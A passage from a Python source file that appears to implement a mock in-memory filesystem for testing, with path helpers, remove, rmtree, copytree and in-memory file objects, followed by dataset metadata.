dot_dot += '..' + self.sep
rel_path = path[len(common_root):]
if not rel_path:
return '.'
if rel_path[0] == self.sep:
# It is probably sufficient to remove just the first character
# since os.path.normpath() collapses separators, but we use
# lstrip() just to be sure.
rel_path = rel_path.lstrip(self.sep)
elif not common_root == '/':
# We are in the case typified by the following example:
# path = "/tmp/foobar", start = "/tmp/foo" -> rel_path = "bar"
common_root = self.dirname(common_root)
dot_dot += '..' + self.sep
rel_path = path[len(common_root) + 1:]
return dot_dot + rel_path
def remove(self, path):
if self.files[path] is None:
self._raise_not_found(path)
self.files[path] = None
self.written_files[path] = None
def rmtree(self, path):
path = self.normpath(path)
for f in self.files:
# We need to add a trailing separator to path to avoid matching
# cases like path='/foo/b' and f='/foo/bar/baz'.
if f == path or f.startswith(path + self.sep):
self.files[f] = None
self.dirs = set(filter(lambda d: not (d == path or d.startswith(path + self.sep)), self.dirs))
def copytree(self, source, destination):
source = self.normpath(source)
destination = self.normpath(destination)
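        # Copy every file whose path falls under |source|, creating the
        # destination's parent directories as needed. Directory entries with
        # no files under them are not copied.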
for source_file in list(self.files):
if source_file.startswith(source):
destination_path = self.join(destination, self.relpath(source_file, source))
self.maybe_make_directory(self.dirname(destination_path))
self.files[destination_path] = self.files[source_file]
def split(self, path):
idx = path.rfind(self.sep)
if idx == -1:
return ('', path)
return (path[:idx], path[(idx + 1):])
def splitext(self, path):
idx = path.rfind('.')
if idx == -1:
idx = len(path)
return (path[0:idx], path[idx:])
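# In-memory file-like objects returned by MockFileSystem's open_*() and
# tempfile helpers above.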
class WritableBinaryFileObject(object):
def __init__(self, fs, path):
self.fs = fs
self.path = path
self.closed = False
self.fs.files[path] = ""
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def close(self):
self.closed = True
def write(self, str):
self.fs.files[self.path] += str
self.fs.written_files[self.path] = self.fs.files[self.path]
class WritableTextFileObject(WritableBinaryFileObject):
def write(self, str):
WritableBinaryFileObject.write(self, str.encode('utf-8'))
class ReadableBinaryFileObject(object):
def __init__(self, fs, path, data):
self.fs = fs
self.path = path
self.closed = False
self.data = data
self.offset = 0
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def close(self):
self.closed = True
def read(self, bytes=None):
if not bytes:
return self.data[self.offset:]
start = self.offset
self.offset += bytes
return self.data[start:self.offset]
class ReadableTextFileObject(ReadableBinaryFileObject):
def __init__(self, fs, path, data):
super(ReadableTextFileObject, self).__init__(fs, path, StringIO.StringIO(data.decode("utf-8")))
def close(self):
self.data.close()
super(ReadableTextFileObject, self).close()
def read(self, bytes=-1):
return self.data.read(bytes)
def readline(self, length=None):
return self.data.readline(length)
def __iter__(self):
return self.data.__iter__()
def next(self):
return self.data.next()
def seek(self, offset, whence=os.SEEK_SET):
self.data.seek(offset, whence)
| bsd-3-clause | 3,958,192,683,675,603,000 | 33.368098 | 107 | 0.590444 | false |